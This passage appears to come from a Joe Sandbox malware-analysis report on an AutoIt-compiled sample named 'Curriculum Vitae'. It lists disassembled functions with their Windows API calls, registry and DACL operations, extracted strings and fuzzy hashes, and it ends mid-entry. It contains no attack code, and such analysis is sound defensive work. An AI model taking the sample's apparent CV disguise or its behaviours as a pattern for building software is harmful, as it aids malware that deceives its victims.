                      • Instruction Fuzzy Hash: 76615B7291421AAFDB019FA4DC49FAEBFB9EB08320F155115FA15EB2A1D7709940CFA0
                      Function 00DC0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 00DC1128
                      • GetDesktopWindow.USER32 ref: 00DC113D
                      • GetWindowRect.USER32(00000000), ref: 00DC1144
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC1199
                      • DestroyWindow.USER32(?), ref: 00DC11B9
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DC11ED
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC120B
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DC121D
                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00DC1232
                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DC1245
                      • IsWindowVisible.USER32(00000000), ref: 00DC12A1
                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DC12BC
                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DC12D0
                      • GetWindowRect.USER32(00000000,?), ref: 00DC12E8
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00DC130E
                      • GetMonitorInfoW.USER32(00000000,?), ref: 00DC1328
                      • CopyRect.USER32(?,?), ref: 00DC133F
                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00DC13AA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 163e661145697ffc02f028c9ee835b8af5179a3cedae4a2a45aca257b492a084
                      • Instruction ID: 4a5d1b5b00355430b3d36ecbd0e77e7361c57ae003d9aaf21e89127896e55ed5
                      • Opcode Fuzzy Hash: 163e661145697ffc02f028c9ee835b8af5179a3cedae4a2a45aca257b492a084
                      • Instruction Fuzzy Hash: D7B19A75604352AFDB00DF64C885F6ABBE4FF85314F04891CF9999B2A2C731E845CBA1
                      Function 00DC0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00DC02E5
                      • _wcslen.LIBCMT ref: 00DC031F
                      • _wcslen.LIBCMT ref: 00DC0389
                      • _wcslen.LIBCMT ref: 00DC03F1
                      • _wcslen.LIBCMT ref: 00DC0475
                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DC04C5
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DC0504
                        • Part of subcall function 00D4F9F2: _wcslen.LIBCMT ref: 00D4F9FD
                        • Part of subcall function 00D9223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D92258
                        • Part of subcall function 00D9223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D9228A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$MessageSend$BuffCharUpper
                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                      • API String ID: 1103490817-719923060
                      • Opcode ID: 86c2b4fa55a4e3e8a490ee93041e953bccbacca5fe65c2febdd6f1404cb5b73d
                      • Instruction ID: e56aa5d12aa7d207712b7ed0a4b1c7cc3a89c5d43345f87c16a7b941258b86e3
                      • Opcode Fuzzy Hash: 86c2b4fa55a4e3e8a490ee93041e953bccbacca5fe65c2febdd6f1404cb5b73d
                      • Instruction Fuzzy Hash: 95E19C31218202CF8B14DF24C550E2ABBE5FF88314F19895DF9969B2A1DB30ED45CBB1
                      Function 00D48891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D48968
                      • GetSystemMetrics.USER32(00000007), ref: 00D48970
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D4899B
                      • GetSystemMetrics.USER32(00000008), ref: 00D489A3
                      • GetSystemMetrics.USER32(00000004), ref: 00D489C8
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D489E5
                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D489F5
                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D48A28
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D48A3C
                      • GetClientRect.USER32(00000000,000000FF), ref: 00D48A5A
                      • GetStockObject.GDI32(00000011), ref: 00D48A76
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D48A81
                        • Part of subcall function 00D4912D: GetCursorPos.USER32(?), ref: 00D49141
                        • Part of subcall function 00D4912D: ScreenToClient.USER32(00000000,?), ref: 00D4915E
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000001), ref: 00D49183
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000002), ref: 00D4919D
                      • SetTimer.USER32(00000000,00000000,00000028,00D490FC), ref: 00D48AA8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: 2a5a18f3686bf17ee8cffab287f3fdaaabbec53257962db5f0062743c0a2dd5b
                      • Instruction ID: 256c8e4291b1ef9971070c28630717652200328e23a1bc7816c4731ce4682cdf
                      • Opcode Fuzzy Hash: 2a5a18f3686bf17ee8cffab287f3fdaaabbec53257962db5f0062743c0a2dd5b
                      • Instruction Fuzzy Hash: 3BB16A71A0020A9FDB14DFA8DD45BAE7BB5FB48314F144229FA19EB290DB70E941CF61
                      Function 00D90D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D91114
                        • Part of subcall function 00D910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91120
                        • Part of subcall function 00D910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D9112F
                        • Part of subcall function 00D910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91136
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9114D
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D90DF5
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D90E29
                      • GetLengthSid.ADVAPI32(?), ref: 00D90E40
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D90E7A
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D90E96
                      • GetLengthSid.ADVAPI32(?), ref: 00D90EAD
                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D90EB5
                      • HeapAlloc.KERNEL32(00000000), ref: 00D90EBC
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D90EDD
                      • CopySid.ADVAPI32(00000000), ref: 00D90EE4
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D90F13
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D90F35
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D90F47
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90F6E
                      • HeapFree.KERNEL32(00000000), ref: 00D90F75
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90F7E
                      • HeapFree.KERNEL32(00000000), ref: 00D90F85
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90F8E
                      • HeapFree.KERNEL32(00000000), ref: 00D90F95
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D90FA1
                      • HeapFree.KERNEL32(00000000), ref: 00D90FA8
                        • Part of subcall function 00D91193: GetProcessHeap.KERNEL32(00000008,00D90BB1,?,00000000,?,00D90BB1,?), ref: 00D911A1
                        • Part of subcall function 00D91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D90BB1,?), ref: 00D911A8
                        • Part of subcall function 00D91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D90BB1,?), ref: 00D911B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                      • String ID:
                      • API String ID: 4175595110-0
                      • Opcode ID: 661d8c1304debeaafc7d042089c64ea6a8856af9866ace742e9bb7d5fae47aa7
                      • Instruction ID: c41b32991a4792b8031e7604b44dfdb9f5f8927eb9b1c254bfa631b2e386c9a0
                      • Opcode Fuzzy Hash: 661d8c1304debeaafc7d042089c64ea6a8856af9866ace742e9bb7d5fae47aa7
                      • Instruction Fuzzy Hash: ED711972A0420AAFDF209FA5EC45FAEBBB8EF05311F184115FA19E6291D7719A05CB70
                      Function 00DBC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBC4BD
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DCCC08,00000000,?,00000000,?,?), ref: 00DBC544
                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DBC5A4
                      • _wcslen.LIBCMT ref: 00DBC5F4
                      • _wcslen.LIBCMT ref: 00DBC66F
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DBC6B2
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DBC7C1
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DBC84D
                      • RegCloseKey.ADVAPI32(?), ref: 00DBC881
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBC88E
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DBC960
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 9721498-966354055
                      • Opcode ID: aaf08381a43c6fb03025923cae0d192c1002711e005f95ab59ea12c0ce4fd2cf
                      • Instruction ID: 18aeba9722390f33be1ae373749a27dc5e441811ebd8f2074827af6821c52e69
                      • Opcode Fuzzy Hash: aaf08381a43c6fb03025923cae0d192c1002711e005f95ab59ea12c0ce4fd2cf
                      • Instruction Fuzzy Hash: 9C126775614201DFDB24DF14C881A6AB7E5FF88714F08885DF88A9B3A2DB31ED41CBA1
                      Function 00DC091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00DC09C6
                      • _wcslen.LIBCMT ref: 00DC0A01
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC0A54
                      • _wcslen.LIBCMT ref: 00DC0A8A
                      • _wcslen.LIBCMT ref: 00DC0B06
                      • _wcslen.LIBCMT ref: 00DC0B81
                        • Part of subcall function 00D4F9F2: _wcslen.LIBCMT ref: 00D4F9FD
                        • Part of subcall function 00D92BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D92BFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$MessageSend$BuffCharUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 1103490817-4258414348
                      • Opcode ID: 8d9f5d36d646d4f6f898c94dd4a6949881c4e65ac6af5115ca2ab8cae684f9e4
                      • Instruction ID: 0defc17fde73e58e5cbb602915662cd23613e7e73f7798788a588674175943ba
                      • Opcode Fuzzy Hash: 8d9f5d36d646d4f6f898c94dd4a6949881c4e65ac6af5115ca2ab8cae684f9e4
                      • Instruction Fuzzy Hash: 13E14735208702DFCB14DF24C450A6ABBE2FF98314B19895CE8969B762D731ED45CBB1
                      Function 00DBC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 1256254125-909552448
                      • Opcode ID: 021e8f477b836d2cc217c3b2d93724f2bd66c51b3af5d18cebce9d715b8d53b2
                      • Instruction ID: ce55ebd3c34e84b979ca2dca21a24a611477a9e1bc076aea15cf0f87b19071be
                      • Opcode Fuzzy Hash: 021e8f477b836d2cc217c3b2d93724f2bd66c51b3af5d18cebce9d715b8d53b2
                      • Instruction Fuzzy Hash: B271C63262012ACBCB20DE6CCD515FF3791BB61754F296528FCA7AB294EA31CD4587B0
                      Function 00DC833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00DC835A
                      • _wcslen.LIBCMT ref: 00DC836E
                      • _wcslen.LIBCMT ref: 00DC8391
                      • _wcslen.LIBCMT ref: 00DC83B4
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DC83F2
                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DC5BF2), ref: 00DC844E
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DC8487
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DC84CA
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DC8501
                      • FreeLibrary.KERNEL32(?), ref: 00DC850D
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DC851D
                      • DestroyIcon.USER32(?,?,?,?,?,00DC5BF2), ref: 00DC852C
                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DC8549
                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DC8555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                      • String ID: .dll$.exe$.icl
                      • API String ID: 799131459-1154884017
                      • Opcode ID: cca13d00195bae771338815b96c41844453b90373db9e1d5219c58ace6fbc60c
                      • Instruction ID: 5924684d9a440e6fc6ea20588a65ef63197d4d4ac448320b8daabbe0707d1f6b
                      • Opcode Fuzzy Hash: cca13d00195bae771338815b96c41844453b90373db9e1d5219c58ace6fbc60c
                      • Instruction Fuzzy Hash: A161CD7155421ABAEB18DF64CC41FBE77A8FB04721F10460AF915D71D1DBB4A980DBB0
                      Function 00D37778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 0-1645009161
                      • Opcode ID: 1714f74564122ee40ed69dead4cd03deb9014388acbfe759902417bf3ca085c6
                      • Instruction ID: f0f6413043f4dc7b326f059c552466acd391112a93272fa0afac29228e125592
                      • Opcode Fuzzy Hash: 1714f74564122ee40ed69dead4cd03deb9014388acbfe759902417bf3ca085c6
                      • Instruction Fuzzy Hash: E181D6B1A04605BFDB21AF60DC42FAE77A9EF15301F084024FD09AB296EBB1D915D7B1
                      Function 00D95A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • LoadIconW.USER32(00000063), ref: 00D95A2E
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D95A40
                      • SetWindowTextW.USER32(?,?), ref: 00D95A57
                      • GetDlgItem.USER32(?,000003EA), ref: 00D95A6C
                      • SetWindowTextW.USER32(00000000,?), ref: 00D95A72
                      • GetDlgItem.USER32(?,000003E9), ref: 00D95A82
                      • SetWindowTextW.USER32(00000000,?), ref: 00D95A88
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D95AA9
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D95AC3
                      • GetWindowRect.USER32(?,?), ref: 00D95ACC
                      • _wcslen.LIBCMT ref: 00D95B33
                      • SetWindowTextW.USER32(?,?), ref: 00D95B6F
                      • GetDesktopWindow.USER32 ref: 00D95B75
                      • GetWindowRect.USER32(00000000), ref: 00D95B7C
                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00D95BD3
                      • GetClientRect.USER32(?,?), ref: 00D95BE0
                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00D95C05
                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D95C2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                      • String ID:
                      • API String ID: 895679908-0
                      • Opcode ID: 78dce74b346536a6ff319de211ed136b67ac65e73a9c47b535a13e9bedfaa9e8
                      • Instruction ID: 83f0d4fa03c4ea0da7d1180babbb47eec550d2e3ba5903ea416deb8213c557a1
                      • Opcode Fuzzy Hash: 78dce74b346536a6ff319de211ed136b67ac65e73a9c47b535a13e9bedfaa9e8
                      • Instruction Fuzzy Hash: 74717D31900B06AFDB21DFA8DE85F6EBBF5FF48704F144528E586A26A4D775E940CB20
                      Function 00D500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                      Download Yara Rule
                      APIs
                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D500C6
                        • Part of subcall function 00D500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E0070C,00000FA0,CBE71E02,?,?,?,?,00D723B3,000000FF), ref: 00D5011C
                        • Part of subcall function 00D500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D723B3,000000FF), ref: 00D50127
                        • Part of subcall function 00D500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D723B3,000000FF), ref: 00D50138
                        • Part of subcall function 00D500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D5014E
                        • Part of subcall function 00D500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D5015C
                        • Part of subcall function 00D500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D5016A
                        • Part of subcall function 00D500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D50195
                        • Part of subcall function 00D500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D501A0
                      • ___scrt_fastfail.LIBCMT ref: 00D500E7
                        • Part of subcall function 00D500A3: __onexit.LIBCMT ref: 00D500A9
                      Strings
                      • SleepConditionVariableCS, xrefs: 00D50154
                      • InitializeConditionVariable, xrefs: 00D50148
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D50122
                      • WakeAllConditionVariable, xrefs: 00D50162
                      • kernel32.dll, xrefs: 00D50133
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 66158676-1714406822
                      • Opcode ID: 2a38a90143adf639d39f80469e9b22483e0f15769fd3e7c80341d0d9eff01336
                      • Instruction ID: 5d42543706a687089aa27270d68ad3fd4e925c67e445da85dd4c6bac0258a44b
                      • Opcode Fuzzy Hash: 2a38a90143adf639d39f80469e9b22483e0f15769fd3e7c80341d0d9eff01336
                      • Instruction Fuzzy Hash: D7212E32A447136FDB116B65AC05F6A3B94DB04B62F18013AFD05E33D1DFB49C088AB1
                      Function 00D930F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                      Download Yara Rule
                      APIs
                      Strings
